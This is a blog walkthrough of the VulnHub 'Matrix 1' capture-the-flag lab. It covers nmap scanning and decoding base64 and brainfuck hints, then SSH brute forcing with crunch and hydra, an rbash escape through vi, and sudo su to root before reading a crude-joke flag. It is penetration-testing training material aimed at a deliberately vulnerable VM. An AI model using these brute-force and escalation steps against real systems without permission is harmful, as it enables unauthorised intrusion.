Sunday, November 17, 2019

VulnHub: Matrix 1 Walkthrough

Lets first start off with an nmap scan of the remote host. 

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST
Nmap scan report for wordy (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
root@ubuntu:~/src#

NMAP came back with three ports open 22,80 and 31337. Two of these look like web servers so lets visit the pages and see what they have to offer.

http://192.168.56.103:
http://192.168.56.103:31337

If we view source on the website on port 31337 we find a base64 encoded string embedded in the source code. 

 class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

Decoded base64 in to:

root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
root@ubuntu:~/src#

Cypher.matrix could be a user name or a file. Lets try it in the url and see what happens. 

http://192.168.56.103:31337/Cypher.matrix

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
...

We get back a file encoded in brainfuck our next task is to decode the text in to something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/ 

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

We get another hint this time on how to login to the box, but first we have to generate a password list according to the hint given. For that we will use crunch wordlist utiltiy. 

root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@ubuntu:~/src/crunch#

Next we will fire up hydra and start brute forcing the ssh server with our user guest and password list we just generated. 

root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16
root@ubuntu:~/src/crunch#

We found the password for the user 'guest'. Now lets login to the ssh server and get a system shell. 

root@ubuntu:~/src/crunch# ssh guest@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
guest@192.168.56.103's password: 
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$

We logged in successfully, but when we try to run commands we see that we are in a restricted bash environment. 

guest@porteus:~$ pwd
/home/guest
guest@porteus:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$

One way we can break out of the rbash shell is to issue the vi command and within vi issue a :!/bin/bash command to break out in to a normal bash shell. 

vi
:!/bin/bash

Once we execute the vi instructions we see that we can cd directory and run commands. 

guest@porteus:~$ cd /home
guest@porteus:/home$ ls
guest/  trinity/
guest@porteus:/home$

If we check sudo rights for the user guest we get back interesting results. 

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$

We can run all programs so in order for us to be able to use sudo su we need to first set up out new unrestricted shell with some path variables. 

guest@porteus:/home$ export SHELL=/bin/bash:$SHELL
guest@porteus:/home$ export PATH=/usr/bin:$PATH
guest@porteus:/home$ export PATH=/bin:$PATH

After we set up the shell we can try and run 'sudo su' on the system to gain a root shell. 

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: 
root@porteus:/home/guest# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest# whoami
root
root@porteus:/home/guest#

Now that we have root we can cd to /root and cat the flag.txt 

root@porteus:/home/guest# cd /root
root@porteus:~# ls -la
total 74
drwx------ 16 root root 4096 Aug 14  2018 ./
drwxr-xr-x 51 root root 4096 Aug  6  2018 ../
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6187 Nov 18 00:05 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1184 Apr 22  2018 .bashrc
drwx------  5 root root 4096 Aug  6  2018 .cache/
drwxr-xr-x 21 root root 4096 Aug 13  2018 .config/
drwx------  3 root root 4096 Aug  6  2018 .dbus/
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4096 Aug  6  2018 .thumbnails/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Desktop/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Documents/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Downloads/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Music/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Pictures/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Public/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Videos/
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
root@porteus:~# cat flag.txt
   _,-.                                                             
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF                 
|`-._`-.\,-'_|  _,-'.                                               
     `-.|.-' | |`.-'|_     WHAT                                     
        |      |_|,-'_`.                                            
              |-._,-'  |     NO, ME NEITHER                         
         jrei | |    _,'                                            
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~#
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...